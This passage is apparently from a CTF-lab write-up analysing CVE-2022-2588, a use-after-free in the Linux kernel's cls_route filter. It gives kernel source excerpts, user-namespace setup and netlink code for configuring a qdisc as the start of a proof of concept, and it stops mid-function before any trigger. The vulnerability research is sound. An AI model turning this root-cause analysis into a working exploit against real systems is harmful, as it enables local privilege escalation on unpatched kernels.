Introduction
0xCD4 modeled CVE-2022-2588 in objstore, one of the Kernel CTF Lab challenges. The vulnerability is a use-after-free (UAF) in cls_route, the module that implements a filter in the Traffic Control (TC) subsystem of the Linux kernel. This post uses kernel 5.18 to examine how the UAF arises and then builds proof-of-concept (PoC) code [1, 2].
Root Cause Analysis
The cls_route module defines the route4_filter structure as follows and manages filters as a linked list (excerpt from net/sched/cls_route.c) [3].
struct route4_filter {
    struct route4_filter __rcu *next;
    u32 id;
    int iif;

    struct tcf_result res;
    struct tcf_exts exts;
    u32 handle;
    struct route4_bucket *bkt;
    struct tcf_proto *tp;
    struct rcu_work rwork;
};
The heads of these lists are kept in arrays inside the route4_head and route4_bucket structures (excerpt from net/sched/cls_route.c) [3].
struct route4_head {
    struct route4_fastmap fastmap[16];
    struct route4_bucket __rcu *table[256 + 1];
    struct rcu_head rcu;
};

struct route4_bucket {
    /* 16 FROM buckets + 16 IIF buckets + 1 wildcard bucket */
    struct route4_filter __rcu *ht[16 + 16 + 1];
    struct rcu_head rcu;
};
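The array indices are obtained by hashing the value stored in the handle member of route4_filter: the handle itself selects the bucket in table, and its upper 16 bits select the list in ht. The implementation of route4_get shows this (excerpt from net/sched/cls_route.c) [3].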
static void *route4_get(struct tcf_proto *tp, u32 handle)
{
    struct route4_head *head = rtnl_dereference(tp->root);
    struct route4_bucket *b;
    struct route4_filter *f;
    unsigned int h1, h2;

    h1 = to_hash(handle);
    if (h1 > 256)
        return NULL;

    h2 = from_hash(handle >> 16);
    if (h2 > 32)
        return NULL;

    b = rtnl_dereference(head->table[h1]);
    if (b) {
        for (f = rtnl_dereference(b->ht[h2]);
             f;
             f = rtnl_dereference(f->next))
            if (f->handle == handle)
                return f;
    }
    return NULL;
}
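To make the indexing concrete, the two hash helpers can be mirrored in user space. The sketch below reproduces to_hash and from_hash as I understand them from net/sched/cls_route.c; they are not part of the excerpt above, so treat the bodies as an assumption. show_slot and check_handle_zero are hypothetical helpers added only for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Userspace mirror of to_hash(); assumed to match cls_route.c. */
unsigned int to_hash(uint32_t id)
{
    unsigned int h = id & 0xFF;

    if (id & 0x8000)
        h += 256;
    return h;
}

/* Userspace mirror of from_hash(); assumed to match cls_route.c. */
unsigned int from_hash(uint32_t id)
{
    id &= 0xFFFF;
    if (id == 0xFFFF)
        return 32;              /* wildcard bucket */
    if (!(id & 0x8000)) {
        if (id > 255)
            return 256;         /* out of range, rejected by route4_get */
        return id & 0xF;        /* one of the 16 FROM buckets */
    }
    return 16 + (id & 0xF);     /* one of the 16 IIF buckets */
}

/* Hypothetical helper: print where a handle lands in table[] and ht[]. */
void show_slot(uint32_t handle)
{
    printf("handle=0x%08x -> table[%u], ht[%u]\n",
           handle, to_hash(handle), from_hash(handle >> 16));
}

/* Hypothetical self-check: handle 0 maps to the very first slot of both arrays. */
void check_handle_zero(void)
{
    assert(to_hash(0) == 0);
    assert(from_hash(0 >> 16) == 0);
}
```

Under these assumptions a filter whose handle is 0 is looked up at table[0] and ht[0], which is the slot that matters for the rest of the analysis.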
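The route4_change function is called by tc_new_tfilter through the change function pointer, and it replaces the existing filter (the fold pointer) with a newly created one (the f pointer). The problem is that when the handle member of the existing filter is 0, the filter is not unlinked from the list ({1}), yet its memory is still freed ({2}). The list is left holding a pointer to freed memory (excerpt from net/sched/cls_route.c) [3].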
static int route4_change(struct net *net, struct sk_buff *in_skb,
                         struct tcf_proto *tp, unsigned long base, u32 handle,
                         struct nlattr **tca, void **arg, u32 flags,
                         struct netlink_ext_ack *extack)
{
    struct route4_head *head = rtnl_dereference(tp->root);
    struct route4_filter __rcu **fp;
    struct route4_filter *fold, *f1, *pfp, *f = NULL;
    struct route4_bucket *b;
    struct nlattr *opt = tca[TCA_OPTIONS];
    struct nlattr *tb[TCA_ROUTE4_MAX + 1];
    unsigned int h, th;
    int err;
    bool new = true;

    /* ... */

    fold = *arg;
    if (fold && handle && fold->handle != handle)
        return -EINVAL;

    err = -ENOBUFS;
    f = kzalloc(sizeof(struct route4_filter), GFP_KERNEL);
    if (!f)
        goto errout;

    /* ... */

    if (fold) {
        f->id = fold->id;
        f->iif = fold->iif;
        f->res = fold->res;
        f->handle = fold->handle;

        f->tp = fold->tp;
        f->bkt = fold->bkt;
        new = false;
    }

    /* ... */

    if (fold && fold->handle && f->handle != fold->handle) { /* {1} */
        th = to_hash(fold->handle);
        h = from_hash(fold->handle >> 16);
        b = rtnl_dereference(head->table[th]);
        if (b) {
            fp = &b->ht[h];
            for (pfp = rtnl_dereference(*fp); pfp;
                 fp = &pfp->next, pfp = rtnl_dereference(*fp)) {
                if (pfp == fold) {
                    rcu_assign_pointer(*fp, fold->next);
                    break;
                }
            }
        }
    }

    route4_reset_fastmap(head);
    *arg = f;
    if (fold) { /* {2} */
        tcf_unbind_filter(tp, &fold->res);
        tcf_exts_get_net(&fold->exts);
        tcf_queue_work(&fold->rwork, route4_delete_filter_work);
    }
    return 0;

errout:
    if (f)
        tcf_exts_destroy(&f->exts);
    kfree(f);
    return err;
}
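The mismatch between {1} and {2} can be modeled in user space without touching freed memory. The following is a toy sketch, not kernel code: toy_filter, toy_replace, and toy_has_dangling are hypothetical names, the freed flag stands in for the deferred free, and insertion of the new filter is left out because it does not affect the outcome.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for route4_filter; "freed" models the queued free work. */
struct toy_filter {
    struct toy_filter *next;
    uint32_t handle;
    bool freed;
};

/* Same shape as the replace path: unlink only when the old handle is
 * nonzero ({1}), but always release the old node ({2}). */
void toy_replace(struct toy_filter **head, struct toy_filter *fold,
                 uint32_t new_handle)
{
    if (fold->handle && new_handle != fold->handle) {   /* {1} */
        for (struct toy_filter **fp = head; *fp; fp = &(*fp)->next) {
            if (*fp == fold) {
                *fp = fold->next;
                break;
            }
        }
    }
    fold->freed = true;                                 /* {2} */
}

/* Returns true if the list still reaches a node that was released. */
bool toy_has_dangling(const struct toy_filter *head)
{
    for (; head; head = head->next)
        if (head->freed)
            return true;
    return false;
}

/* Hypothetical self-check: replacing a handle-0 filter leaves it linked. */
void toy_check(void)
{
    struct toy_filter old = { NULL, 0, false };
    struct toy_filter *head = &old;

    toy_replace(&head, &old, 0x10001);
    assert(head == &old && toy_has_dangling(head));
}
```

With a nonzero old handle the same call unlinks the node first, so the list never reaches released memory; only the handle-0 case leaves the stale entry behind.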
Proof of Concept
User namespace and capabilities
Triggering this vulnerability requires the CAP_NET_ADMIN capability, as the following source shows (excerpt from net/sched/cls_api.c) [3].
static int tc_new_tfilter(struct sk_buff *skb, struct nlmsghdr *n,
                          struct netlink_ext_ack *extack)
{
    struct net *net = sock_net(skb->sk);

    /* ... */

    if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN))
        return -EPERM;

    /* ... */
}
For an ordinary user to obtain this capability, even if only nominally, the process has to move into new namespaces. These can be created by calling the unshare system call with the CLONE_NEWUSER | CLONE_NEWNET flags [9, 10].
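A minimal sketch of that step, assuming a kernel that allows unprivileged user namespaces. enter_user_and_net_ns is a hypothetical helper name; it only wraps unshare and reports the error instead of exiting.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <sched.h>

/* Hypothetical helper: move the calling process into a new user namespace
 * and a new network namespace. Returns 0 on success, -errno on failure
 * (for example -EPERM when unprivileged user namespaces are disabled). */
int enter_user_and_net_ns(void)
{
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == -1)
        return -errno;
    return 0;
}
```

After a successful call, the CAP_NET_ADMIN check shown above is evaluated against the new user namespace that owns the new network namespace, so the TC requests in the following sections are no longer rejected with EPERM.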
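Netlink and rtnetlink
Netlink is a socket-based interface for communication between user space and the kernel. The protocol parameter of the socket system call selects the subsystem to talk to. The TC functionality covered here is reached through rtnetlink, which is identified by NETLINK_ROUTE. A message sent to the kernel over it has the following layout [4, 5, 6].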
[ Netlink message header ][ Subsystem message header ][ Attributes ]

@ Subsystem message header structures: struct tcmsg, etc.
The netlink message header above is the nlmsghdr structure, defined as follows (excerpt from include/uapi/linux/netlink.h) [3].
struct nlmsghdr {
    __u32 nlmsg_len;   /* Length of message including header */
    __u16 nlmsg_type;  /* Message content */
    __u16 nlmsg_flags; /* Additional flags */
    __u32 nlmsg_seq;   /* Sequence number */
    __u32 nlmsg_pid;   /* Sending process port ID */
};
The subsystem message header depends on the subsystem being addressed. For TC it is the tcmsg structure, defined as follows (excerpt from include/uapi/linux/rtnetlink.h) [3].
struct tcmsg {
    unsigned char tcm_family;
    unsigned char tcm__pad1;
    unsigned short tcm__pad2;
    int tcm_ifindex;
    __u32 tcm_handle;
    __u32 tcm_parent;
/* tcm_block_index is used instead of tcm_parent
 * in case tcm_ifindex == TCM_IFINDEX_MAGIC_BLOCK
 */
#define tcm_block_index tcm_parent
    __u32 tcm_info;
};
Attributes likewise depend on which netlink family the message is sent to. rtnetlink, for example, uses the rtattr structure (excerpt from include/uapi/linux/rtnetlink.h) [3, 5].
/*
   Generic structure for encapsulation of optional route information.
   It is reminiscent of sockaddr, but with sa_family replaced
   with attribute type.
 */

struct rtattr {
    unsigned short rta_len;
    unsigned short rta_type;
};
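The three parts of the layout fit together through the length and alignment macros from the uapi headers. The sketch below builds a header, a tcmsg, and one string attribute in a flat buffer; demo_req, demo_put_attr, and demo_build are hypothetical names, and the 64-byte attribute area is an arbitrary size chosen for the illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>

/* Hypothetical request buffer: header, tcmsg, then room for attributes. */
struct demo_req {
    struct nlmsghdr hdr;
    struct tcmsg tc;
    char attrs[64];
};

/* Append one attribute at the aligned end of the message.
 * Returns 0 on success, -1 if it would not fit. */
int demo_put_attr(struct demo_req *req, unsigned short type,
                  const void *data, unsigned short len)
{
    size_t off = NLMSG_ALIGN(req->hdr.nlmsg_len);
    struct rtattr *rta;

    if (off + RTA_ALIGN(RTA_LENGTH(len)) > sizeof(*req))
        return -1;
    rta = (struct rtattr *)((char *)req + off);
    rta->rta_type = type;
    rta->rta_len = RTA_LENGTH(len);     /* attribute header + payload */
    if (len)
        memcpy(RTA_DATA(rta), data, len);
    req->hdr.nlmsg_len = off + RTA_ALIGN(rta->rta_len);
    return 0;
}

/* Build header + tcmsg + TCA_KIND="htb" and return the total length. */
uint32_t demo_build(struct demo_req *req)
{
    memset(req, 0, sizeof(*req));
    req->hdr.nlmsg_len = NLMSG_LENGTH(sizeof(req->tc));
    req->hdr.nlmsg_type = RTM_NEWQDISC;
    req->hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE;
    req->tc.tcm_family = AF_UNSPEC;
    /* sizeof("htb") is 4: three characters plus the terminating NUL */
    if (demo_put_attr(req, TCA_KIND, "htb", sizeof("htb")) < 0)
        return 0;
    return req->hdr.nlmsg_len;
}
```

On a typical Linux ABI the header is 16 bytes and tcmsg is 20 bytes, so the message is 36 bytes before the attribute and 44 bytes after it (4-byte attribute header plus 4-byte payload).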
rtnetlink has the RTM_ family of message types, and the rtnl_register function maps each message type to the function that handles it (excerpt from net/core/rtnetlink.c) [3, 5].
/**
 * rtnl_register - Register a rtnetlink message type
 * @protocol: Protocol family or PF_UNSPEC
 * @msgtype: rtnetlink message type
 * @doit: Function pointer called for each request message
 * @dumpit: Function pointer called for each dump request (NLM_F_DUMP) message
 * @flags: rtnl_link_flags to modify behaviour of doit/dumpit functions
 *
 * Registers the specified function pointers (at least one of them has
 * to be non-NULL) to be called whenever a request message for the
 * specified protocol family and message type is received.
 *
 * The special protocol family PF_UNSPEC may be used to define fallback
 * function pointers for the case when no entry for the specific protocol
 * family exists.
 */
void rtnl_register(int protocol, int msgtype,
                   rtnl_doit_func doit, rtnl_dumpit_func dumpit,
                   unsigned int flags)
{
    int err;

    err = rtnl_register_internal(NULL, protocol, msgtype, doit, dumpit,
                                 flags);
    if (err)
        pr_err("Unable to register rtnetlink message handler, "
               "protocol = %d, message type = %d\n", protocol, msgtype);
}

void __init rtnetlink_init(void)
{
    /* ... */

    rtnl_register(PF_UNSPEC, RTM_GETLINK, rtnl_getlink,
                  rtnl_dump_ifinfo, 0);
    rtnl_register(PF_UNSPEC, RTM_SETLINK, rtnl_setlink, NULL, 0);
    rtnl_register(PF_UNSPEC, RTM_NEWLINK, rtnl_newlink, NULL, 0);
    rtnl_register(PF_UNSPEC, RTM_DELLINK, rtnl_dellink, NULL, 0);

    rtnl_register(PF_UNSPEC, RTM_GETADDR, NULL, rtnl_dump_all, 0);
    rtnl_register(PF_UNSPEC, RTM_GETROUTE, NULL, rtnl_dump_all, 0);
    rtnl_register(PF_UNSPEC, RTM_GETNETCONF, NULL, rtnl_dump_all, 0);

    rtnl_register(PF_UNSPEC, RTM_NEWLINKPROP, rtnl_newlinkprop, NULL, 0);
    rtnl_register(PF_UNSPEC, RTM_DELLINKPROP, rtnl_dellinkprop, NULL, 0);

    rtnl_register(PF_BRIDGE, RTM_NEWNEIGH, rtnl_fdb_add, NULL, 0);
    rtnl_register(PF_BRIDGE, RTM_DELNEIGH, rtnl_fdb_del, NULL, 0);
    rtnl_register(PF_BRIDGE, RTM_GETNEIGH, rtnl_fdb_get, rtnl_fdb_dump, 0);

    rtnl_register(PF_BRIDGE, RTM_GETLINK, NULL, rtnl_bridge_getlink, 0);
    rtnl_register(PF_BRIDGE, RTM_DELLINK, rtnl_bridge_dellink, NULL, 0);
    rtnl_register(PF_BRIDGE, RTM_SETLINK, rtnl_bridge_setlink, NULL, 0);

    rtnl_register(PF_UNSPEC, RTM_GETSTATS, rtnl_stats_get, rtnl_stats_dump,
                  0);
    rtnl_register(PF_UNSPEC, RTM_SETSTATS, rtnl_stats_set, NULL, 0);
}
The TC-related APIs reached through rtnetlink register their handlers in the same way. The classifier API, for example, registers the filter-related types (excerpt from net/sched/cls_api.c) [3].
static int __init tc_filter_init(void)
{
    int err;

    /* ... */

    rtnl_register(PF_UNSPEC, RTM_NEWTFILTER, tc_new_tfilter, NULL,
                  RTNL_FLAG_DOIT_UNLOCKED);
    rtnl_register(PF_UNSPEC, RTM_DELTFILTER, tc_del_tfilter, NULL,
                  RTNL_FLAG_DOIT_UNLOCKED);
    rtnl_register(PF_UNSPEC, RTM_GETTFILTER, tc_get_tfilter,
                  tc_dump_tfilter, RTNL_FLAG_DOIT_UNLOCKED);
    rtnl_register(PF_UNSPEC, RTM_NEWCHAIN, tc_ctl_chain, NULL, 0);
    rtnl_register(PF_UNSPEC, RTM_DELCHAIN, tc_ctl_chain, NULL, 0);
    rtnl_register(PF_UNSPEC, RTM_GETCHAIN, tc_ctl_chain,
                  tc_dump_chain, 0);

    return 0;

    /* ... */
}
When one of these types is placed in the nlmsg_type member of nlmsghdr and the message is sent, the function mapped to it is called.
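The register-then-dispatch idea can be pictured with a small table indexed by message type. This is a deliberately simplified toy, not how the kernel stores its handlers (the real table is also keyed by protocol family); every toy_ name and the TOY_MAX_TYPE bound are assumptions made for the illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/socket.h>
#include <linux/rtnetlink.h>

#define TOY_MAX_TYPE 128    /* assumption: any bound above the types used here */

typedef int (*toy_doit_func)(int msgtype);

static toy_doit_func toy_handlers[TOY_MAX_TYPE];

/* Map one message type to its handler, in the spirit of rtnl_register(). */
int toy_register(int msgtype, toy_doit_func doit)
{
    if (msgtype < 0 || msgtype >= TOY_MAX_TYPE || !doit)
        return -1;
    toy_handlers[msgtype] = doit;
    return 0;
}

/* Look up the handler by the type carried in nlmsg_type and call it. */
int toy_dispatch(int msgtype)
{
    if (msgtype < 0 || msgtype >= TOY_MAX_TYPE || !toy_handlers[msgtype])
        return -1;          /* stand-in for an "unsupported" error */
    return toy_handlers[msgtype](msgtype);
}

/* Stand-in for tc_new_tfilter: just echoes the type it was called for. */
int toy_new_tfilter(int msgtype)
{
    return msgtype;
}
```

Registering toy_new_tfilter for RTM_NEWTFILTER and then dispatching a message of that type reaches the handler, while a type with no registered handler is rejected.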
Libnetlink examples
Building a netlink message by hand, sending it, and parsing the reply involves many details, so it is better to reuse existing library functions for sending and receiving. moises-silva presented the example that fits this goal best. The libnetlink.h and libnetlink.c files it relies on can be taken from the iproute2 source [7, 8].
As moises-silva's example also shows, communication through libnetlink follows a fixed pattern [7].
- Open rtnetlink (rtnl) handle
- Set netlink message header
- Set subsystem message header (e.g., tcmsg)
- Set attributes
- Call rtnl_talk function
- Close rtnetlink (rtnl) handle
Based on this, let's write an example that reads Queueing Discipline information. The tc_qdisc.c file in iproute2 shows how the headers have to be set. The resulting example is as follows [8].
#define _GNU_SOURCE

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdbool.h>
#include <signal.h>
#include <time.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/uio.h>
#include <unistd.h>
#include <sched.h>
#include <fcntl.h>
#include <syslog.h>
#include <errno.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <linux/if_link.h>
#include <linux/neighbour.h>
#include <linux/netconf.h>
#include <linux/if_ether.h>
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <libnl3/netlink/route/tc.h>
#include <libnl3/netlink/route/qdisc.h>
#include <libnl3/netlink/route/qdisc/tbf.h>

/* ----------------------< libnetlink >--------------------------------- */

struct rtnl_handle {
    int fd;
    struct sockaddr_nl local;
    struct sockaddr_nl peer;
    __u32 seq;
    __u32 dump;
    int proto;
    FILE *dump_fp;
#define RTNL_HANDLE_F_LISTEN_ALL_NSID 0x01
    int flags;
};

#define NLMSG_TAIL(nmsg) \
    ((struct rtattr *) (((void *) (nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))


static inline const char *rta_getattr_str(const struct rtattr *rta)
{
    return (const char *)RTA_DATA(rta);
}

static int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data,
                     int alen)
{
    int len = RTA_LENGTH(alen);
    struct rtattr *rta;

    if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) {
        fprintf(stderr,
                "addattr_l ERROR: message exceeded bound of %d\n",
                maxlen);
        return -1;
    }
    rta = NLMSG_TAIL(n);
    rta->rta_type = type;
    rta->rta_len = len;
    /* addattr_nest() passes data == NULL with alen == 0; skip the copy then */
    if (alen)
        memcpy(RTA_DATA(rta), data, alen);
    n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len);
    return 0;
}

static int addattr32(struct nlmsghdr *n, int maxlen, int type, __u32 data)
{
    return addattr_l(n, maxlen, type, &data, sizeof(__u32));
}

static int addattr64(struct nlmsghdr *n, int maxlen, int type, __u64 data)
{
    return addattr_l(n, maxlen, type, &data, sizeof(__u64));
}

static struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type)
{
    struct rtattr *nest = NLMSG_TAIL(n);

    addattr_l(n, maxlen, type, NULL, 0);
    /* addattr_l(n, maxlen, type, &nest, 8); */
    return nest;
}

static int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest)
{
    nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest;
    return n->nlmsg_len;
}

#ifndef SOL_NETLINK
#define SOL_NETLINK 270
#endif

#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif

static int rcvbuf = 1024 * 1024;

static void rtnl_close(struct rtnl_handle *rth)
{
    if (rth->fd >= 0) {
        close(rth->fd);
        rth->fd = -1;
    }
}

static int rtnl_open_byproto(struct rtnl_handle *rth, unsigned int subscriptions,
                             int protocol)
{
    socklen_t addr_len;
    int sndbuf = 32768;

    memset(rth, 0, sizeof(*rth));

    rth->proto = protocol;
    rth->fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, protocol);
    if (rth->fd < 0) {
        perror("Cannot open netlink socket");
        return -1;
    }

    if (setsockopt(rth->fd, SOL_SOCKET, SO_SNDBUF,
                   &sndbuf, sizeof(sndbuf)) < 0) {
        perror("SO_SNDBUF");
        return -1;
    }

    if (setsockopt(rth->fd, SOL_SOCKET, SO_RCVBUF,
                   &rcvbuf, sizeof(rcvbuf)) < 0) {
        perror("SO_RCVBUF");
        return -1;
    }

    memset(&rth->local, 0, sizeof(rth->local));
    rth->local.nl_family = AF_NETLINK;
    rth->local.nl_groups = subscriptions;

    if (bind(rth->fd, (struct sockaddr *)&rth->local,
             sizeof(rth->local)) < 0) {
        perror("Cannot bind netlink socket");
        return -1;
    }
    addr_len = sizeof(rth->local);
    if (getsockname(rth->fd, (struct sockaddr *)&rth->local,
                    &addr_len) < 0) {
        perror("Cannot getsockname");
        return -1;
    }
    if (addr_len != sizeof(rth->local)) {
        fprintf(stderr, "Wrong address length %d\n", addr_len);
        return -1;
    }
    if (rth->local.nl_family != AF_NETLINK) {
        fprintf(stderr, "Wrong address family %d\n",
                rth->local.nl_family);
        return -1;
    }
    rth->seq = time(NULL);
    return 0;
}

static int rtnl_open(struct rtnl_handle *rth, unsigned int subscriptions)
{
    return rtnl_open_byproto(rth, subscriptions, NETLINK_ROUTE);
}

static int __rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
                       struct nlmsghdr *answer, size_t maxlen,
                       bool show_rtnl_err)
{
    int status;
    unsigned int seq;
    struct nlmsghdr *h;
    struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
    struct iovec iov = {
        .iov_base = n,
        .iov_len = n->nlmsg_len
    };
    struct msghdr msg = {
        .msg_name = &nladdr,
        .msg_namelen = sizeof(nladdr),
        .msg_iov = &iov,
        .msg_iovlen = 1,
    };
    char buf[32768] = {};

    n->nlmsg_seq = seq = ++rtnl->seq;

    if (answer == NULL)
        n->nlmsg_flags |= NLM_F_ACK;

    status = sendmsg(rtnl->fd, &msg, 0);
    if (status < 0) {
        perror("Cannot talk to rtnetlink");
        return -1;
    }

    iov.iov_base = buf;
    while (1) {
        iov.iov_len = sizeof(buf);
        status = recvmsg(rtnl->fd, &msg, 0);

        if (status < 0) {
            if (errno == EINTR || errno == EAGAIN)
                continue;
            fprintf(stderr, "netlink receive error %s (%d)\n",
                    strerror(errno), errno);
            return -1;
        }
        if (status == 0) {
            fprintf(stderr, "EOF on netlink\n");
            return -1;
        }
        if (msg.msg_namelen != sizeof(nladdr)) {
            fprintf(stderr,
                    "sender address length == %d\n",
                    msg.msg_namelen);
            exit(1);
        }
        for (h = (struct nlmsghdr *)buf; status >= sizeof(*h); ) {
            int len = h->nlmsg_len;
            int l = len - sizeof(*h);

            /* DumpHex(&msg, len); */

            if (l < 0 || len > status) {
                if (msg.msg_flags & MSG_TRUNC) {
                    fprintf(stderr, "Truncated message\n");
                    return -1;
                }
                fprintf(stderr,
                        "!!!malformed message: len=%d\n",
                        len);
                exit(1);
            }

            if (nladdr.nl_pid != 0 ||
                h->nlmsg_pid != rtnl->local.nl_pid ||
                h->nlmsg_seq != seq) {
                /* Don't forget to skip that message. */
                status -= NLMSG_ALIGN(len);
                h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
                continue;
            }

            if (h->nlmsg_type == NLMSG_ERROR) {
                struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(h);

                if (l < sizeof(struct nlmsgerr)) {
                    fprintf(stderr, "ERROR truncated\n");
                } else if (!err->error) {
                    if (answer)
                        memcpy(answer, h,
                               MIN(maxlen, h->nlmsg_len));
                    return 0;
                }

                if (rtnl->proto != NETLINK_SOCK_DIAG && show_rtnl_err)
                    fprintf(stderr,
                            "RTNETLINK answers: %s\n",
                            strerror(-err->error));
                errno = -err->error;
                return -1;
            }

            if (answer) {
                memcpy(answer, h,
                       MIN(maxlen, h->nlmsg_len));
                return 0;
            }

            fprintf(stderr, "Unexpected reply!!!\n");

            status -= NLMSG_ALIGN(len);
            h = (struct nlmsghdr *)((char *)h + NLMSG_ALIGN(len));
        }

        if (msg.msg_flags & MSG_TRUNC) {
            fprintf(stderr, "Message truncated\n");
            continue;
        }

        if (status) {
            fprintf(stderr, "!!!Remnant of size %d\n", status);
            exit(1);
        }
    }
}

static int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n,
                     struct nlmsghdr *answer, size_t maxlen)
{
    return __rtnl_talk(rtnl, n, answer, maxlen, true);
}

static int parse_rtattr_flags(struct rtattr *tb[], int max, struct rtattr *rta,
                              int len, unsigned short flags)
{
    unsigned short type;

    memset(tb, 0, sizeof(struct rtattr *) * (max + 1));
    while (RTA_OK(rta, len)) {
        type = rta->rta_type & ~flags;
        if ((type <= max) && (!tb[type]))
            tb[type] = rta;
        rta = RTA_NEXT(rta, len);
    }
    if (len)
        fprintf(stderr, "!!!Deficit %d, rta_len=%d\n",
                len, rta->rta_len);
    return 0;
}

/* --------------------------------------------------------------------- */

enum {
    TCA_BUF_MAX = (64 * 1024)
};

struct tc_req {
    struct nlmsghdr hdr;
    struct tcmsg tchdr;
    uint8_t buf[TCA_BUF_MAX];
};

#define LOG printf
#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)

void die(const char *funcname)
{
    perror(funcname);
    exit(EXIT_FAILURE);
}

void print_qdisc_info(const char *ifname)
{
    int err;
    /* The reply is copied into this buffer, so it must be able to hold a
     * whole message, not just a bare nlmsghdr. */
    struct tc_req res;
    struct tcmsg *t;
    struct rtattr *tb[TCA_MAX + 1];
    struct rtnl_handle rth;
    struct tc_req qdreq;

    LOG_FUNC();

    /* 1. Open rtnl handle */
    err = rtnl_open(&rth, 0);
    if (err)
        die("rtnl_open");

    /* 2. Set netlink message header */
    memset(&qdreq, 0, sizeof(qdreq));
    memset(&res, 0, sizeof(res));
    qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
    qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
    qdreq.hdr.nlmsg_type = RTM_GETQDISC;

    /* 3. Set subsystem message header */
    qdreq.tchdr.tcm_family = AF_UNSPEC;
    qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
    printf("ifindex: %d\n", qdreq.tchdr.tcm_ifindex);

    /* 4. Set attributes (Not needed for this example) */

    /* 5. Call rtnl_talk function; maxlen is the size of the reply buffer */
    err = rtnl_talk(&rth, &qdreq.hdr, &res.hdr, sizeof(res));
    if (err < 0)
        die("rtnl_talk");

    /* Parse and print response from the kernel */
    t = NLMSG_DATA(&res.hdr);
    if (res.hdr.nlmsg_type != RTM_NEWQDISC &&
        res.hdr.nlmsg_type != RTM_DELQDISC) {
        /* errno is not meaningful here, so do not use perror() */
        fprintf(stderr, "Not a qdisc\n");
        exit(EXIT_FAILURE);
    }

    parse_rtattr_flags(tb, TCA_MAX, TCA_RTA(t),
                       res.hdr.nlmsg_len - NLMSG_LENGTH(sizeof(*t)),
                       NLA_F_NESTED);
    if (tb[TCA_KIND])
        printf("qdisc %s %x:[%08x]\n", rta_getattr_str(tb[TCA_KIND]),
               t->tcm_handle >> 16, t->tcm_handle);

    /* 6. Close rtnetlink handle */
    rtnl_close(&rth);
}

int main(void)
{
    print_qdisc_info("lo");
    return 0;
}
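Traffic Control Queueing Discipline
A queueing discipline (qdisc) defines the rules by which the kernel queues packets before handing them to the network adapter driver. Classes can be used to set the priority with which packets are taken from the queue, and qdiscs that support them are called classful qdiscs. A filter classifies which class a packet goes into when it is enqueued. Filters are therefore used by classful qdiscs, and adding a filter requires the qdisc of the network interface to be classful [11].
In practice, the loopback device often has its qdisc set to noqueue or has none set at all, so we set it to htb, which is a classful qdisc. The elements that have to be set for this are as follows [3, 8].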
| nlmsghdr member | Value |
|---|---|
| nlmsg_len | NLMSG_LENGTH(sizeof(< subsystem header structure variable >)) |
| nlmsg_flags | NLM_F_REQUEST \| NLM_F_CREATE |
| nlmsg_type | RTM_NEWQDISC |

| tcmsg member | Value |
|---|---|
| tcm_family | AF_UNSPEC |
| tcm_ifindex | ifindex of the network interface |
| tcm_handle | 32-bit handle (e.g., 0x10000) |
| tcm_parent | parent or TC_H_ROOT |

| Attribute | Value |
|---|---|
| TCA_KIND | "htb" |
| TCA_OPTIONS | Not NULL (nest that carries TCA_HTB_INIT) |
| TCA_HTB_INIT | tc_htb_glob structure whose version member is 0x30011 >> 16 |
A function that sets the values from the tables above and sends the request to the kernel can be written as follows.
enum {
    TCA_BUF_MAX = (64 * 1024)
};

struct tc_req {
    struct nlmsghdr hdr;
    struct tcmsg tchdr;
    uint8_t buf[TCA_BUF_MAX];
};

void die(const char *funcname)
{
    perror(funcname);
    exit(EXIT_FAILURE);
}

#define LOG printf
#define LOG_FUNC() LOG("%s:%d [%s]\n", __FILE__, __LINE__, __func__)

void user_tc_modify_qdisc(const char *ifname, int cmd, unsigned int flags,
                          uint32_t handle, const char *kind)
{
    int err;
    struct rtnl_handle rth;
    struct tc_req qdreq;
    struct rtattr *tail;
    struct tc_htb_glob glob;

    LOG_FUNC();

    err = rtnl_open(&rth, 0);
    if (err)
        die("rtnl_open");

    /* Zero the request first so that no stack garbage is sent */
    memset(&qdreq, 0, sizeof(qdreq));
    qdreq.hdr.nlmsg_len = NLMSG_LENGTH(sizeof(qdreq.tchdr));
    qdreq.hdr.nlmsg_flags = NLM_F_REQUEST | flags;
    qdreq.hdr.nlmsg_type = cmd;

    qdreq.tchdr.tcm_family = AF_UNSPEC;
    qdreq.tchdr.tcm_ifindex = if_nametoindex(ifname);
    qdreq.tchdr.tcm_handle = handle;
    qdreq.tchdr.tcm_parent = TC_H_ROOT;

